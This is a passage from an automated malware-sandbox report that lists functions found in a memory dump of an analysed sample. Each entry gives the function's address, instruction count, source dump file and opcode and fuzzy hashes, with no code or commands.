                                              • Source File: 00000010.00000002.3266835259.0000000000F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F20000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_16_2_f20000_ywKDUBCUA.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: d7b0e9543d888de37519bf1753d270a22583ffed2924ef1a7933920d5664cb05
                                              • Instruction ID: fc02116dc114d23d9020fc50ec59034b0b6ec741d33fab17d25dbc4d66fa27d9
                                              • Opcode Fuzzy Hash: d7b0e9543d888de37519bf1753d270a22583ffed2924ef1a7933920d5664cb05
                                              • Instruction Fuzzy Hash: 2D214F34B00228CFDB14EB78D5547AE77F6BB59354F200468D006EB360DB369D41DBAA
                                              Function 00F21680 Relevance: .1, Instructions: 69COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000010.00000002.3266835259.0000000000F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F20000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_16_2_f20000_ywKDUBCUA.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 9e794b980bbcc553f64029a8067d9a8fbfc688069dd794102a30afd80bc5311a
                                              • Instruction ID: 35063ecd6b86d956624bdfca7c746215ed972a8c523b972a0c330b61b758a570
                                              • Opcode Fuzzy Hash: 9e794b980bbcc553f64029a8067d9a8fbfc688069dd794102a30afd80bc5311a
                                              • Instruction Fuzzy Hash: A621B778A001514BDF62FB68F884B6D3769FB94320F104E21E006CB259FA34DC889B95
                                              Function 00F24F5A Relevance: .1, Instructions: 69COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000010.00000002.3266835259.0000000000F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F20000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_16_2_f20000_ywKDUBCUA.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: fa7b4db5b039a2ecc6b1b24027212e87b32988a2cae8f247039b3f873bc96efe
                                              • Instruction ID: 54446f79ed23eac720ebf53e94d7ed44fc5a5f13cd9b8ca471052ad9b83cbe10
                                              • Opcode Fuzzy Hash: fa7b4db5b039a2ecc6b1b24027212e87b32988a2cae8f247039b3f873bc96efe
                                              • Instruction Fuzzy Hash: F5212734B00215CFCB54EB78D958BAD7BF1AF88710F2004A8E406EB361EB759D01DBA5
                                              Function 00F24F68 Relevance: .1, Instructions: 68COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000010.00000002.3266835259.0000000000F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F20000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_16_2_f20000_ywKDUBCUA.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 4df141950730e648c81b8ee3f742fd0a175eadf9ed485fc6038bae412601ac60
                                              • Instruction ID: df6f0a0e46227cfa2576afedccf19ebe9d59c900adf0354c52f466520f74f920
                                              • Opcode Fuzzy Hash: 4df141950730e648c81b8ee3f742fd0a175eadf9ed485fc6038bae412601ac60
                                              • Instruction Fuzzy Hash: AF211634B00215CFCB54EB78D958BAD77F5AB88710F204468E406EB3A1EB75DD00DBA5
                                              Function 00F26F40 Relevance: .1, Instructions: 65COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000010.00000002.3266835259.0000000000F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F20000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_16_2_f20000_ywKDUBCUA.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 46f802f8a3b9576967a721de4a186ead098cd89c0b0eef29f34406e212d6bd08
                                              • Instruction ID: 5903f7b998aa88b3489ffffde64c960d6c96668e3ef0b091bf05014368a724d1
                                              • Opcode Fuzzy Hash: 46f802f8a3b9576967a721de4a186ead098cd89c0b0eef29f34406e212d6bd08
                                              • Instruction Fuzzy Hash: DE11C131F002158BDF10ABB8B90436EBBE5EB84330F20857AD52AC7285FB35CC459391
                                              Function 00F20848 Relevance: .1, Instructions: 62COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000010.00000002.3266835259.0000000000F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F20000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_16_2_f20000_ywKDUBCUA.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 04dde8e92379b97051f4728d9cf3f92b969ab8ef4db10a8f1fec895834ecea5e
                                              • Instruction ID: 72a2eca5e07f43d3f87d74ebbb6b1458c9d905cd794ba458f044092c7f237748
                                              • Opcode Fuzzy Hash: 04dde8e92379b97051f4728d9cf3f92b969ab8ef4db10a8f1fec895834ecea5e
                                              • Instruction Fuzzy Hash: 39119132F002249BDF15AB79E4483AE36A5EB55320F604979E006CB343EE25DCC5ABC1
                                              Function 00F20838 Relevance: .1, Instructions: 57COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000010.00000002.3266835259.0000000000F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F20000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_16_2_f20000_ywKDUBCUA.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: fac806d47e7969390236e8dd2c546d49b624085b1fab3ae1ffb0aef920202557
                                              • Instruction ID: 9012b9ef7935f534cf7a0cebd8acdf2888295eee9a0a25aece2ae1271f8a56be
                                              • Opcode Fuzzy Hash: fac806d47e7969390236e8dd2c546d49b624085b1fab3ae1ffb0aef920202557
                                              • Instruction Fuzzy Hash: B511A032F042208BEF656B74E5583BF7651EB51324F644979E006CB243EE24CC85ABC1
                                              Function 00F21468 Relevance: .1, Instructions: 53COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000010.00000002.3266835259.0000000000F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F20000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_16_2_f20000_ywKDUBCUA.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 62517a59d2bbc6b396bd529eefb16b9595061bd4dec488d3f31c2d3851c4060b
                                              • Instruction ID: 42e9bf7190e3a1237a153d935de1699e45bc8ec64b4f5c03f502aee623b7f617
                                              • Opcode Fuzzy Hash: 62517a59d2bbc6b396bd529eefb16b9595061bd4dec488d3f31c2d3851c4060b
                                              • Instruction Fuzzy Hash: B7012131E012248FCB21EFB999511AE7BE5FB59320B14047AD909E7202EB35DD419BE5
                                              Function 00F2FF18 Relevance: .0, Instructions: 46COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000010.00000002.3266835259.0000000000F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F20000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_16_2_f20000_ywKDUBCUA.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 696b9b7450dcba5d40601a383494712604ab609e67795abcd43e594adc58a9cf
                                              • Instruction ID: d74f47ab55f1046756773eafcb0572192fe54df2ca1fdd7b3961d0844d0c2ad7
                                              • Opcode Fuzzy Hash: 696b9b7450dcba5d40601a383494712604ab609e67795abcd43e594adc58a9cf
                                              • Instruction Fuzzy Hash: C3F0F432B147A42BC7266678692457F3BAA8FC3220F0840BEA945CB292DD20880593A3
                                              Function 00F27128 Relevance: .0, Instructions: 40COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000010.00000002.3266835259.0000000000F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F20000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_16_2_f20000_ywKDUBCUA.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 529014f9abef7a28d6d3f1be6246425b97e095164a586c6baa6f1446e14ff3cc
                                              • Instruction ID: 716beb2f0a2c28e70942de3ba08d38b7fd2cacc5f83a35fe14c2766997679707
                                              • Opcode Fuzzy Hash: 529014f9abef7a28d6d3f1be6246425b97e095164a586c6baa6f1446e14ff3cc
                                              • Instruction Fuzzy Hash: EF01C439B40215CFCB94EB68D698A6C77F2FF88215B5544A8E506CB378DB31AD12CB40
                                              Function 00F2819A Relevance: .0, Instructions: 37COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000010.00000002.3266835259.0000000000F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F20000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_16_2_f20000_ywKDUBCUA.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 83d60d36af56b9283d138a6b52faa925b6d243fa8319db19b06893bcebfe693e
                                              • Instruction ID: f95a91b9391164d7364a1aa36c771313928b2f36bd744bdf9381e71507baf473
                                              • Opcode Fuzzy Hash: 83d60d36af56b9283d138a6b52faa925b6d243fa8319db19b06893bcebfe693e
                                              • Instruction Fuzzy Hash: CF017C74900198AFCB02FBB8E991B9D7FB1DF40204F1096A8C40497266EE302E098B50
                                              Function 00F214F4 Relevance: .0, Instructions: 36COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000010.00000002.3266835259.0000000000F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F20000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_16_2_f20000_ywKDUBCUA.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 225b99f5be1c0b2e3b6ac3076187e319b153fc142a553a541d7ec31274d18458
                                              • Instruction ID: 7b56a7c679fae1d161e1cebc2d01f9222d8c13c9870e12cacde905fa91aa2758
                                              • Opcode Fuzzy Hash: 225b99f5be1c0b2e3b6ac3076187e319b153fc142a553a541d7ec31274d18458
                                              • Instruction Fuzzy Hash: 17F0F633E042348BDB32DBA4A8921AD7BA1FE6932071800D7D909DB253D725D943E755
                                              Function 00F281A8 Relevance: .0, Instructions: 33COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000010.00000002.3266835259.0000000000F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F20000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_16_2_f20000_ywKDUBCUA.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 8133fcba145929ac01b08d0bb61b2e40474f7793875161ac184c24c5ff8c0b79
                                              • Instruction ID: 1d19896869fda312744fa25ce911aeeed3d5fbd9ce77e3cb15c66e33853a7220
                                              • Opcode Fuzzy Hash: 8133fcba145929ac01b08d0bb61b2e40474f7793875161ac184c24c5ff8c0b79
                                              • Instruction Fuzzy Hash: 9FF03174A00119AFCB02FBA8F951B9D7BB5EF40304F509668D40597259EF302E488B90

                                              Non-executed Functions

                                              Function 00F20610 Relevance: 6.4, Strings: 5, Instructions: 145COMMON
                                              Download Yara Rule
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000010.00000002.3266835259.0000000000F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F20000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_16_2_f20000_ywKDUBCUA.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: p$p$p$p$p
                                              • API String ID: 0-945622192
                                              • Opcode ID: bdb5545f725c04ddcc513f1b01580229f89bcf2d34764c1557f62cc63419dcfa
                                              • Instruction ID: 0faef5af00bc73afc7a37c34b955e99f363462b1360a0f8cab7e696df6e3337e
                                              • Opcode Fuzzy Hash: bdb5545f725c04ddcc513f1b01580229f89bcf2d34764c1557f62cc63419dcfa
                                              • Instruction Fuzzy Hash: DF418E8380E3E14FE31342A468683A93F648FA33A9F1A01D7C4D5DB1E3E919585ED766
                                              Function 00F20678 Relevance: 5.1, Strings: 4, Instructions: 91COMMON
                                              Download Yara Rule
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000010.00000002.3266835259.0000000000F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F20000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_16_2_f20000_ywKDUBCUA.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: p$p$p$p
                                              • API String ID: 0-3467077657
                                              • Opcode ID: 85840523e7aa45122d32b89be39731e719d86286698a3226f6b48c92b7dd099a
                                              • Instruction ID: 6893f7852aeae02e02fe4e3dea9e441cc28ca5c0aeb4167cae0a21c461f8c4a6
                                              • Opcode Fuzzy Hash: 85840523e7aa45122d32b89be39731e719d86286698a3226f6b48c92b7dd099a
                                              • Instruction Fuzzy Hash: 7F31219791E3E10FE303427468687993F618F63299F4A01DBC8D5DF4E3E919191F8366